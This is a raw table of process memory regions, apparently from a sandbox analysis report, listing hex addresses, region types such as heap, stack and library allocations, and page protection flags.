|
||
|
5E10000
|
heap
|
page read and write
|
||
|
90E000
|
stack
|
page read and write
|
||
|
28BD000
|
trusted library allocation
|
page read and write
|
||
|
5DBA000
|
heap
|
page read and write
|
||
|
B51000
|
unkown
|
page execute read
|
||
|
5176000
|
trusted library allocation
|
page read and write
|
||
|
22CB21BD000
|
trusted library allocation
|
page read and write
|
||
|
1578000
|
unkown
|
page read and write
|
||
|
14B8000
|
heap
|
page read and write
|
||
|
12A0000
|
trusted library allocation
|
page read and write
|
||
|
4135000
|
trusted library allocation
|
page read and write
|
||
|
48BD000
|
stack
|
page read and write
|
||
|
850000
|
heap
|
page read and write
|
||
|
3110000
|
trusted library allocation
|
page read and write
|
||
|
529E000
|
stack
|
page read and write
|
||
|
305F000
|
unkown
|
page read and write
|
||
|
655000
|
unkown
|
page readonly
|
||
|
2570000
|
heap
|
page execute and read and write
|
||
|
255C000
|
stack
|
page read and write
|
||
|
53E0000
|
unkown
|
page read and write
|
||
|
22CC8988000
|
heap
|
page read and write
|
||
|
22CC86A8000
|
heap
|
page read and write
|
||
|
1641000
|
unkown
|
page readonly
|
||
|
22CB226D000
|
trusted library allocation
|
page read and write
|
||
|
22CC8687000
|
heap
|
page execute and read and write
|
||
|
CA513FE000
|
stack
|
page read and write
|
||
|
7DF43AFA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
54CB000
|
trusted library allocation
|
page read and write
|
||
|
24D0000
|
trusted library allocation
|
page read and write
|
||
|
11F0000
|
heap
|
page read and write
|
||
|
22CB227C000
|
trusted library allocation
|
page read and write
|
||
|
D85000
|
unkown
|
page write copy
|
||
|
22CAE8B0000
|
heap
|
page read and write
|
||
|
5DA6000
|
heap
|
page read and write
|
||
|
7FFC3DAF0000
|
trusted library allocation
|
page read and write
|
||
|
2CCF000
|
trusted library allocation
|
page read and write
|
||
|
2DCF000
|
unkown
|
page read and write
|
||
|
25E9000
|
trusted library allocation
|
page read and write
|
||
|
22CAE659000
|
heap
|
page read and write
|
||
|
7FF7013FC000
|
unkown
|
page readonly
|
||
|
51AE000
|
direct allocation
|
page read and write
|
||
|
C8A000
|
unkown
|
page read and write
|
||
|
73D000
|
heap
|
page read and write
|
||
|
22CB21C3000
|
trusted library allocation
|
page read and write
|
||
|
7FFC3D7CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
BB4000
|
unkown
|
page read and write
|
||
|
25CD000
|
trusted library allocation
|
page read and write
|
||
|
589E000
|
stack
|
page read and write
|
||
|
7FFC3DC20000
|
trusted library allocation
|
page read and write
|
||
|
7FFC3DBA0000
|
trusted library allocation
|
page read and write
|
||
|
22CC0481000
|
trusted library allocation
|
page read and write
|
||
|
5DB99B9000
|
stack
|
page read and write
|
||
|
22CC8790000
|
heap
|
page read and write
|
||
|
7FFC3D9E0000
|
trusted library allocation
|
page read and write
|
||
|
A48000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7FFC3D8E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22CAE7F0000
|
heap
|
page read and write
|
||
|
D78000
|
unkown
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
7FFC3DAC0000
|
trusted library allocation
|
page read and write
|
||
|
19C000
|
stack
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
1441000
|
heap
|
page read and write
|
||
|
2ACE000
|
trusted library allocation
|
page read and write
|
||
|
22CB1131000
|
trusted library allocation
|
page read and write
|
||
|
CA512FE000
|
stack
|
page read and write
|
||
|
7C0000
|
unkown
|
page readonly
|
||
|
3131000
|
trusted library allocation
|
page read and write
|
||
|
4C9C000
|
trusted library allocation
|
page read and write
|
||
|
53C1000
|
unkown
|
page read and write
|
||
|
4B3D000
|
heap
|
page read and write
|
||
|
70AD000
|
stack
|
page read and write
|
||
|
854000
|
heap
|
page read and write
|
||
|
22CAE7B0000
|
heap
|
page readonly
|
||
|
A12000
|
unkown
|
page read and write
|
||
|
7FFC3DA40000
|
trusted library allocation
|
page read and write
|
||
|
381D000
|
trusted library allocation
|
page read and write
|
||
|
1180000
|
heap
|
page read and write
|
||
|
BC62EFF000
|
stack
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
22CAE635000
|
heap
|
page read and write
|
||
|
28C8000
|
trusted library allocation
|
page read and write
|
||
|
22CB21B7000
|
trusted library allocation
|
page read and write
|
||
|
5DBA9CC000
|
stack
|
page read and write
|
||
|
2913000
|
trusted library allocation
|
page read and write
|
||
|
2ECE000
|
unkown
|
page read and write
|
||
|
24B0000
|
trusted library allocation
|
page read and write
|
||
|
4ECE000
|
stack
|
page read and write
|
||
|
7FF7013C1000
|
unkown
|
page execute read
|
||
|
854000
|
heap
|
page read and write
|
||
|
C6E000
|
unkown
|
page read and write
|
||
|
5C33000
|
trusted library allocation
|
page read and write
|
||
|
A1F000
|
unkown
|
page readonly
|
||
|
2EF0000
|
unkown
|
page read and write
|
||
|
5DBA7CF000
|
stack
|
page read and write
|
||
|
6D00000
|
heap
|
page read and write
|
||
|
13F0000
|
trusted library allocation
|
page read and write
|
||
|
4C50000
|
trusted library allocation
|
page read and write
|
||
|
63E000
|
unkown
|
page write copy
|
||
|
BC62B2C000
|
stack
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
AD9000
|
heap
|
page read and write
|
||
|
87D000
|
heap
|
page read and write
|
||
|
22CAE6B7000
|
heap
|
page read and write
|
||
|
53D0000
|
unkown
|
page read and write
|
||
|
1F0DEEA0000
|
heap
|
page read and write
|
||
|
11ED000
|
stack
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
86B000
|
heap
|
page read and write
|
||
|
53C0000
|
unkown
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
2916000
|
trusted library allocation
|
page read and write
|
||
|
22CAE710000
|
heap
|
page read and write
|
||
|
B3E000
|
unkown
|
page read and write
|
||
|
53C1000
|
unkown
|
page read and write
|
||
|
1430000
|
heap
|
page read and write
|
||
|
22CB1CEC000
|
trusted library allocation
|
page read and write
|
||
|
11B5000
|
heap
|
page read and write
|
||
|
22CB14D9000
|
trusted library allocation
|
page read and write
|
||
|
7FFC3D7C2000
|
trusted library allocation
|
page read and write
|
||
|
2969000
|
trusted library allocation
|
page read and write
|
||
|
22CC85A0000
|
heap
|
page execute and read and write
|
||
|
22CB2107000
|
trusted library allocation
|
page read and write
|
||
|
5FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
854000
|
heap
|
page read and write
|
||
|
7FFC3D7C0000
|
trusted library allocation
|
page read and write
|
||
|
5D20000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7013C1000
|
unkown
|
page execute read
|
||
|
22CC8A6A000
|
heap
|
page read and write
|
||
|
5DB9B3E000
|
stack
|
page read and write
|
||
|
2610000
|
heap
|
page read and write
|
||
|
3240000
|
unkown
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
5AC5000
|
trusted library allocation
|
page read and write
|
||
|
22CAE65F000
|
heap
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
145F000
|
heap
|
page read and write
|
||
|
5CF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
54D0000
|
trusted library allocation
|
page read and write
|
||
|
8E1000
|
unkown
|
page execute read
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
3250000
|
unkown
|
page read and write
|
||
|
8E0000
|
unkown
|
page readonly
|
||
|
5010000
|
direct allocation
|
page read and write
|
||
|
22CC8951000
|
heap
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
22CB228E000
|
trusted library allocation
|
page read and write
|
||
|
5DE5000
|
heap
|
page read and write
|
||
|
22CB166F000
|
trusted library allocation
|
page read and write
|
||
|
77B000
|
heap
|
page read and write
|
||
|
BB4000
|
unkown
|
page read and write
|
||
|
5484000
|
trusted library allocation
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
255CBDCC000
|
heap
|
page read and write
|
||
|
6F8000
|
stack
|
page read and write
|
||
|
24BB000
|
trusted library allocation
|
page execute and read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
A4E000
|
stack
|
page read and write
|
||
|
22CB1D2E000
|
trusted library allocation
|
page read and write
|
||
|
D7A000
|
unkown
|
page read and write
|
||
|
55B0000
|
heap
|
page read and write
|
||
|
22CAE7C0000
|
trusted library allocation
|
page read and write
|
||
|
22CAE7A0000
|
trusted library allocation
|
page read and write
|
||
|
6A60000
|
trusted library allocation
|
page read and write
|
||
|
3119000
|
trusted library allocation
|
page read and write
|
||
|
2967000
|
trusted library allocation
|
page read and write
|
||
|
4C26000
|
trusted library allocation
|
page read and write
|
||
|
A60000
|
heap
|
page read and write
|
||
|
575E000
|
stack
|
page read and write
|
||
|
22CB20F3000
|
trusted library allocation
|
page read and write
|
||
|
599E000
|
stack
|
page read and write
|
||
|
7FFC3DAD0000
|
trusted library allocation
|
page read and write
|
||
|
22CB050C000
|
trusted library allocation
|
page read and write
|
||
|
22CB0E78000
|
trusted library allocation
|
page read and write
|
||
|
5D00000
|
trusted library allocation
|
page read and write
|
||
|
5DB957E000
|
stack
|
page read and write
|
||
|
22CC8A0C000
|
heap
|
page read and write
|
||
|
22CB10FB000
|
trusted library allocation
|
page read and write
|
||
|
22CAE61D000
|
heap
|
page read and write
|
||
|
8E0000
|
unkown
|
page readonly
|
||
|
2972000
|
trusted library allocation
|
page read and write
|
||
|
22CB189B000
|
trusted library allocation
|
page read and write
|
||
|
D0E000
|
stack
|
page read and write
|
||
|
5DBA84B000
|
stack
|
page read and write
|
||
|
D39000
|
heap
|
page read and write
|
||
|
2EE0000
|
unkown
|
page read and write
|
||
|
22CB085C000
|
trusted library allocation
|
page read and write
|
||
|
22CB21C0000
|
trusted library allocation
|
page read and write
|
||
|
22CB1120000
|
trusted library allocation
|
page read and write
|
||
|
5790000
|
unkown
|
page read and write
|
||
|
1181000
|
heap
|
page read and write
|
||
|
2BF4000
|
trusted library allocation
|
page read and write
|
||
|
28AF000
|
trusted library allocation
|
page read and write
|
||
|
12A6000
|
heap
|
page read and write
|
||
|
7FFC3DAA0000
|
trusted library allocation
|
page read and write
|
||
|
2CA2000
|
trusted library allocation
|
page read and write
|
||
|
5E0D000
|
heap
|
page read and write
|
||
|
165E000
|
stack
|
page read and write
|
||
|
51DE000
|
stack
|
page read and write
|
||
|
56A1000
|
unkown
|
page read and write
|
||
|
7FFC3D7D0000
|
trusted library allocation
|
page read and write
|
||
|
5DA2000
|
heap
|
page read and write
|
||
|
1428000
|
heap
|
page read and write
|
||
|
52DE000
|
stack
|
page read and write
|
||
|
22CB1E26000
|
trusted library allocation
|
page read and write
|
||
|
582E000
|
stack
|
page read and write
|
||
|
22CB189E000
|
trusted library allocation
|
page read and write
|
||
|
9A0D000
|
heap
|
page read and write
|
||
|
B07000
|
heap
|
page read and write
|
||
|
AE6000
|
trusted library allocation
|
page execute and read and write
|
||
|
513D000
|
direct allocation
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
2872000
|
trusted library allocation
|
page read and write
|
||
|
6E6A000
|
stack
|
page read and write
|
||
|
22CB19F7000
|
trusted library allocation
|
page read and write
|
||
|
22CAE8B5000
|
heap
|
page read and write
|
||
|
2A62000
|
heap
|
page read and write
|
||
|
5DB96FE000
|
stack
|
page read and write
|
||
|
7FF7013F5000
|
unkown
|
page write copy
|
||
|
990000
|
heap
|
page read and write
|
||
|
22CC86F7000
|
heap
|
page read and write
|
||
|
A512000
|
unkown
|
page read and write
|
||
|
4C40000
|
heap
|
page execute and read and write
|
||
|
27EE000
|
trusted library allocation
|
page read and write
|
||
|
1445000
|
heap
|
page read and write
|
||
|
4DB0000
|
trusted library allocation
|
page read and write
|
||
|
1400000
|
heap
|
page read and write
|
||
|
7FF7013F5000
|
unkown
|
page read and write
|
||
|
1410000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFC3DB20000
|
trusted library allocation
|
page read and write
|
||
|
A1B2000
|
unkown
|
page read and write
|
||
|
722E000
|
stack
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
AC0000
|
trusted library allocation
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
5CA0000
|
trusted library allocation
|
page read and write
|
||
|
25D2000
|
trusted library allocation
|
page read and write
|
||
|
BB4000
|
unkown
|
page read and write
|
||
|
5D9C000
|
heap
|
page read and write
|
||
|
557E000
|
stack
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
22CB226A000
|
trusted library allocation
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
22CB1D9B000
|
trusted library allocation
|
page read and write
|
||
|
22CB1770000
|
trusted library allocation
|
page read and write
|
||
|
22CB0907000
|
trusted library allocation
|
page read and write
|
||
|
592F000
|
stack
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
283F000
|
trusted library allocation
|
page read and write
|
||
|
24B5000
|
trusted library allocation
|
page execute and read and write
|
||
|
5139000
|
direct allocation
|
page read and write
|
||
|
1170000
|
heap
|
page read and write
|
||
|
85F000
|
heap
|
page read and write
|
||
|
22CC88FB000
|
heap
|
page read and write
|
||
|
255CD670000
|
heap
|
page read and write
|
||
|
BB4000
|
unkown
|
page read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
A11E000
|
unkown
|
page read and write
|
||
|
AF0000
|
heap
|
page read and write
|
||
|
2AAA000
|
trusted library allocation
|
page read and write
|
||
|
53C1000
|
unkown
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
7FFC3DB70000
|
trusted library allocation
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
9B0000
|
unkown
|
page readonly
|
||
|
8C3000
|
heap
|
page read and write
|
||
|
A2A0000
|
unkown
|
page read and write
|
||
|
22CB21A2000
|
trusted library allocation
|
page read and write
|
||
|
28B5000
|
trusted library allocation
|
page read and write
|
||
|
22CB21BA000
|
trusted library allocation
|
page read and write
|
||
|
5ADE000
|
stack
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
663E000
|
stack
|
page read and write
|
||
|
22CC0497000
|
trusted library allocation
|
page read and write
|
||
|
2ADA000
|
trusted library allocation
|
page read and write
|
||
|
1500000
|
unkown
|
page read and write
|
||
|
2A20000
|
trusted library allocation
|
page read and write
|
||
|
7FFC3DC40000
|
trusted library allocation
|
page read and write
|
||
|
9D0000
|
unkown
|
page readonly
|
||
|
B7E000
|
unkown
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
2E75000
|
heap
|
page read and write
|
||
|
56A0000
|
unkown
|
page read and write
|
||
|
28DE000
|
trusted library allocation
|
page read and write
|
||
|
677B000
|
stack
|
page read and write
|
||
|
24B7000
|
trusted library allocation
|
page execute and read and write
|
||
|
C3F000
|
stack
|
page read and write
|
||
|
8BB000
|
heap
|
page read and write
|
||
|
7FFC3DB54000
|
trusted library allocation
|
page read and write
|
||
|
BC0000
|
direct allocation
|
page read and write
|
||
|
297D000
|
trusted library allocation
|
page read and write
|
||
|
9A5000
|
unkown
|
page read and write
|
||
|
5B2D000
|
stack
|
page read and write
|
||
|
854000
|
heap
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
4E15000
|
heap
|
page read and write
|
||
|
22CB090B000
|
trusted library allocation
|
page read and write
|
||
|
A4CA000
|
unkown
|
page read and write
|
||
|
22CB08C8000
|
trusted library allocation
|
page read and write
|
||
|
AE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFC3D8A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AC3000
|
trusted library allocation
|
page read and write
|
||
|
A9C000
|
heap
|
page read and write
|
||
|
D86000
|
unkown
|
page read and write
|
||
|
7FFC3D9D0000
|
trusted library allocation
|
page read and write
|
||
|
1F0DEEFD000
|
heap
|
page read and write
|
||
|
C0C000
|
stack
|
page read and write
|
||
|
B4F000
|
stack
|
page read and write
|
||
|
6E0000
|
heap
|
page read and write
|
||
|
7FFC3DA10000
|
trusted library allocation
|
page read and write
|
||
|
6CF0000
|
heap
|
page read and write
|
||
|
7FFC3D990000
|
trusted library allocation
|
page execute and read and write
|
||
|
C9B000
|
stack
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
22CC88C8000
|
heap
|
page read and write
|
||
|
7FFC3D9C0000
|
trusted library allocation
|
page read and write
|
||
|
541D000
|
direct allocation
|
page read and write
|
||
|
8AD000
|
heap
|
page read and write
|
||
|
736D000
|
stack
|
page read and write
|
||
|
7D0000
|
unkown
|
page readonly
|
||
|
1280000
|
trusted library allocation
|
page read and write
|
||
|
5DB9ABE000
|
stack
|
page read and write
|
||
|
7F4000
|
heap
|
page read and write
|
||
|
27CA000
|
trusted library allocation
|
page read and write
|
||
|
7FF7013E0000
|
unkown
|
page readonly
|
||
|
C4F000
|
unkown
|
page execute read
|
||
|
7FFC3DB60000
|
trusted library allocation
|
page read and write
|
||
|
DB4000
|
unkown
|
page readonly
|
||
|
7FFC3D870000
|
trusted library allocation
|
page read and write
|
||
|
22CC076F000
|
trusted library allocation
|
page read and write
|
||
|
7FFC3D7E0000
|
trusted library allocation
|
page read and write
|
||
|
22CC077D000
|
trusted library allocation
|
page read and write
|
||
|
13DB000
|
trusted library allocation
|
page execute and read and write
|
||
|
22CAE655000
|
heap
|
page read and write
|
||
|
255CBDB0000
|
heap
|
page read and write
|
||
|
9B30000
|
heap
|
page read and write
|
||
|
22CB178E000
|
trusted library allocation
|
page read and write
|
||
|
22CC86F3000
|
heap
|
page read and write
|
||
|
A1F000
|
unkown
|
page readonly
|
||
|
2C34000
|
trusted library allocation
|
page read and write
|
||
|
AB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFC3DAB0000
|
trusted library allocation
|
page read and write
|
||
|
255CD6A0000
|
direct allocation
|
page read and write
|
||
|
BB4000
|
unkown
|
page read and write
|
||
|
22CC8900000
|
heap
|
page read and write
|
||
|
2A0A000
|
trusted library allocation
|
page read and write
|
||
|
2600000
|
trusted library allocation
|
page read and write
|
||
|
2B4E000
|
trusted library allocation
|
page read and write
|
||
|
75FE000
|
stack
|
page read and write
|
||
|
5ACA000
|
trusted library allocation
|
page read and write
|
||
|
BB4000
|
unkown
|
page read and write
|
||
|
2A2B000
|
trusted library allocation
|
page read and write
|
||
|
CA511FF000
|
stack
|
page read and write
|
||
|
3120000
|
heap
|
page execute and read and write
|
||
|
22CB1997000
|
trusted library allocation
|
page read and write
|
||
|
4D88000
|
trusted library allocation
|
page read and write
|
||
|
68C0000
|
heap
|
page read and write
|
||
|
2B44000
|
trusted library allocation
|
page read and write
|
||
|
22CC8935000
|
heap
|
page read and write
|
||
|
3825000
|
trusted library allocation
|
page read and write
|
||
|
4728000
|
trusted library allocation
|
page read and write
|
||
|
22CAE800000
|
trusted library allocation
|
page read and write
|
||
|
22CB06AB000
|
trusted library allocation
|
page read and write
|
||
|
1F0DEDC0000
|
heap
|
page read and write
|
||
|
5D70000
|
trusted library allocation
|
page execute and read and write
|
||
|
22CC8757000
|
heap
|
page read and write
|
||
|
54C9000
|
trusted library allocation
|
page read and write
|
||
|
9FFA000
|
unkown
|
page read and write
|
||
|
2859000
|
trusted library allocation
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
163D000
|
unkown
|
page read and write
|
||
|
304B000
|
heap
|
page read and write
|
||
|
255CD696000
|
heap
|
page read and write
|
||
|
2B59000
|
trusted library allocation
|
page read and write
|
||
|
9EFE000
|
trusted library allocation
|
page read and write
|
||
|
27FE000
|
trusted library allocation
|
page read and write
|
||
|
C96000
|
unkown
|
page read and write
|
||
|
9748000
|
heap
|
page read and write
|
||
|
7FFC3D81C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7F4000
|
heap
|
page read and write
|
||
|
5AA0000
|
trusted library allocation
|
page read and write
|
||
|
5C61000
|
trusted library allocation
|
page read and write
|
||
|
5AA5000
|
trusted library allocation
|
page read and write
|
||
|
2C56000
|
trusted library allocation
|
page read and write
|
||
|
22CC89B0000
|
heap
|
page read and write
|
||
|
C80000
|
unkown
|
page execute read
|
||
|
BB0000
|
heap
|
page read and write
|
||
|
7F0000
|
unkown
|
page read and write
|
||
|
AF7000
|
heap
|
page read and write
|
||
|
2580000
|
trusted library allocation
|
page read and write
|
||
|
5AA9000
|
trusted library allocation
|
page read and write
|
||
|
96A000
|
stack
|
page read and write
|
||
|
13C6000
|
heap
|
page read and write
|
||
|
255CD7A0000
|
direct allocation
|
page read and write
|
||
|
5AA2000
|
trusted library allocation
|
page read and write
|
||
|
3846000
|
trusted library allocation
|
page read and write
|
||
|
4C23000
|
trusted library allocation
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
2ED0000
|
unkown
|
page read and write
|
||
|
2A4B000
|
trusted library allocation
|
page read and write
|
||
|
1286000
|
heap
|
page read and write
|
||
|
7FFC3DB59000
|
trusted library allocation
|
page read and write
|
||
|
1294000
|
trusted library allocation
|
page read and write
|
||
|
830000
|
heap
|
page read and write
|
||
|
5DBA60E000
|
stack
|
page read and write
|
||
|
7FFC3D7DB000
|
trusted library allocation
|
page read and write
|
||
|
7FFC3DBC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7F4000
|
heap
|
page read and write
|
||
|
51BE000
|
trusted library allocation
|
page read and write
|
||
|
22CAE7F7000
|
heap
|
page read and write
|
||
|
22CB1A52000
|
trusted library allocation
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
5DB993C000
|
stack
|
page read and write
|
||
|
68A0000
|
trusted library section
|
page read and write
|
||
|
840000
|
heap
|
page read and write
|
||
|
82D000
|
stack
|
page read and write
|
||
|
22CAE500000
|
heap
|
page read and write
|
||
|
2919000
|
trusted library allocation
|
page read and write
|
||
|
5AB8000
|
trusted library allocation
|
page read and write
|
||
|
22CC8480000
|
heap
|
page read and write
|
||
|
7FF7013F8000
|
unkown
|
page readonly
|
||
|
4F38000
|
heap
|
page read and write
|
||
|
30F0000
|
heap
|
page read and write
|
||
|
A0F000
|
stack
|
page read and write
|
||
|
732D000
|
stack
|
page read and write
|
||
|
163D000
|
unkown
|
page read and write
|
||
|
7FFC3D97A000
|
trusted library allocation
|
page read and write
|
||
|
255CD690000
|
direct allocation
|
page read and write
|
||
|
22CB176D000
|
trusted library allocation
|
page read and write
|
||
|
53C1000
|
unkown
|
page read and write
|
||
|
280D000
|
trusted library allocation
|
page read and write
|
||
|
4E99000
|
trusted library allocation
|
page read and write
|
||
|
A6C000
|
heap
|
page read and write
|
||
|
22CC8698000
|
heap
|
page read and write
|
||
|
22CC87B0000
|
heap
|
page read and write
|
||
|
7FFC3DA60000
|
trusted library allocation
|
page read and write
|
||
|
65FE000
|
stack
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
2864000
|
trusted library allocation
|
page read and write
|
||
|
77C000
|
stack
|
page read and write
|
||
|
22CC877A000
|
heap
|
page read and write
|
||
|
7FFC3DA20000
|
trusted library allocation
|
page read and write
|
||
|
22CB1892000
|
trusted library allocation
|
page read and write
|
||
|
2BE7000
|
trusted library allocation
|
page read and write
|
||
|
5DB967E000
|
stack
|
page read and write
|
||
|
D87000
|
unkown
|
page readonly
|
||
|
22CB18B6000
|
trusted library allocation
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
25BE000
|
trusted library allocation
|
page read and write
|
||
|
4D7D000
|
stack
|
page read and write
|
||
|
22CB084E000
|
trusted library allocation
|
page read and write
|
||
|
C0D000
|
unkown
|
page execute read
|
||
|
22CB228B000
|
trusted library allocation
|
page read and write
|
||
|
22CB179D000
|
trusted library allocation
|
page read and write
|
||
|
C00000
|
direct allocation
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
22CC04A9000
|
trusted library allocation
|
page read and write
|
||
|
1181000
|
heap
|
page read and write
|
||
|
22CB1BAF000
|
trusted library allocation
|
page read and write
|
||
|
53C1000
|
unkown
|
page read and write
|
||
|
5E1A000
|
heap
|
page read and write
|
||
|
D3B000
|
heap
|
page read and write
|
||
|
7FFC3DA80000
|
trusted library allocation
|
page read and write
|
||
|
2C8F000
|
trusted library allocation
|
page read and write
|
||
|
5C30000
|
trusted library allocation
|
page read and write
|
||
|
9C0000
|
unkown
|
page readonly
|
||
|
5DBA68E000
|
stack
|
page read and write
|
||
|
2C40000
|
trusted library allocation
|
page read and write
|
||
|
651000
|
unkown
|
page read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
5F7E000
|
stack
|
page read and write
|
||
|
4C60000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFC3DB30000
|
trusted library allocation
|
page read and write
|
||
|
255CBCB0000
|
heap
|
page read and write
|
||
|
1600000
|
unkown
|
page readonly
|
||
|
1293000
|
trusted library allocation
|
page execute and read and write
|
||
|
22CB2285000
|
trusted library allocation
|
page read and write
|
||
|
6E20000
|
trusted library allocation
|
page read and write
|
||
|
5DBA74F000
|
stack
|
page read and write
|
||
|
27FA000
|
trusted library allocation
|
page read and write
|
||
|
1000000
|
unkown
|
page readonly
|
||
|
124E000
|
stack
|
page read and write
|
||
|
22CC8A17000
|
heap
|
page read and write
|
||
|
255CD665000
|
heap
|
page read and write
|
||
|
22CB1999000
|
trusted library allocation
|
page read and write
|
||
|
763E000
|
stack
|
page read and write
|
||
|
22CC89C3000
|
heap
|
page read and write
|
||
|
7B0000
|
unkown
|
page readonly
|
||
|
9881000
|
heap
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
D98000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
7FFC3DB33000
|
trusted library allocation
|
page read and write
|
||
|
2C50000
|
trusted library allocation
|
page read and write
|
||
|
2B89000
|
trusted library allocation
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
22CB1CB7000
|
trusted library allocation
|
page read and write
|
||
|
830000
|
heap
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
657000
|
unkown
|
page readonly
|
||
|
650000
|
unkown
|
page read and write
|
||
|
9E0000
|
heap
|
page read and write
|
||
|
22CAE780000
|
trusted library allocation
|
page read and write
|
||
|
2B42000
|
trusted library allocation
|
page read and write
|
||
|
19C000
|
stack
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
7FFC3DB68000
|
trusted library allocation
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
2C82000
|
trusted library allocation
|
page read and write
|
||
|
52F0000
|
direct allocation
|
page read and write
|
||
|
2C9C000
|
trusted library allocation
|
page read and write
|
||
|
7FF7013C0000
|
unkown
|
page readonly
|
||
|
2721000
|
trusted library allocation
|
page read and write
|
||
|
554E000
|
unkown
|
page read and write
|
||
|
22CC89E2000
|
heap
|
page read and write
|
||
|
287A000
|
trusted library allocation
|
page read and write
|
||
|
98D7000
|
heap
|
page read and write
|
||
|
284B000
|
trusted library allocation
|
page read and write
|
||
|
7FFC3DA50000
|
trusted library allocation
|
page read and write
|
||
|
AFA000
|
stack
|
page read and write
|
||
|
A12000
|
unkown
|
page write copy
|
||
|
A33A000
|
unkown
|
page read and write
|
||
|
A75000
|
heap
|
page read and write
|
||
|
22CAE5E0000
|
heap
|
page read and write
|
||
|
22CB0B9F000
|
trusted library allocation
|
page read and write
|
||
|
3721000
|
trusted library allocation
|
page read and write
|
||
|
A2E000
|
unkown
|
page read and write
|
||
|
5DB91F3000
|
stack
|
page read and write
|
||
|
22CAE675000
|
heap
|
page read and write
|
||
|
14A6000
|
heap
|
page read and write
|
||
|
145D000
|
heap
|
page read and write
|
||
|
299C000
|
trusted library allocation
|
page read and write
|
||
|
4131000
|
trusted library allocation
|
page read and write
|
||
|
22CB0470000
|
heap
|
page execute and read and write
|
||
|
687D000
|
stack
|
page read and write
|
||
|
281E000
|
trusted library allocation
|
page read and write
|
||
|
7FFC3DA00000
|
trusted library allocation
|
page read and write
|
||
|
7580000
|
trusted library allocation
|
page read and write
|
||
|
848000
|
heap
|
page read and write
|
||
|
56A1000
|
unkown
|
page read and write
|
||
|
161F000
|
stack
|
page read and write
|
||
|
25A0000
|
trusted library allocation
|
page read and write
|
||
|
2A17000
|
trusted library allocation
|
page read and write
|
||
|
ACD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
22CC8711000
|
heap
|
page read and write
|
||
|
255CBD90000
|
heap
|
page read and write
|
||
|
4C60000
|
heap
|
page read and write
|
||
|
22CC8680000
|
heap
|
page execute and read and write
|
||
|
7EE000
|
stack
|
page read and write
|
||
|
ED0000
|
heap
|
page read and write
|
||
|
1271000
|
heap
|
page read and write
|
||
|
7F0000
|
heap
|
page read and write
|
||
|
22CC8967000
|
heap
|
page read and write
|
||
|
5D80000
|
heap
|
page read and write
|
||
|
22CB1B8C000
|
trusted library allocation
|
page read and write
|
||
|
22CB1794000
|
trusted library allocation
|
page read and write
|
||
|
B00000
|
heap
|
page read and write
|
||
|
D89000
|
unkown
|
page readonly
|
||
|
2C5C000
|
trusted library allocation
|
page read and write
|
||
|
5A9B000
|
stack
|
page read and write
|
||
|
A1A0000
|
unkown
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
22CC8C60000
|
heap
|
page read and write
|
||
|
9E89000
|
trusted library allocation
|
page read and write
|
||
|
25E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFC3DB50000
|
trusted library allocation
|
page read and write
|
||
|
22CC8890000
|
heap
|
page read and write
|
||
|
7F4000
|
heap
|
page read and write
|
||
|
22CB1B41000
|
trusted library allocation
|
page read and write
|
||
|
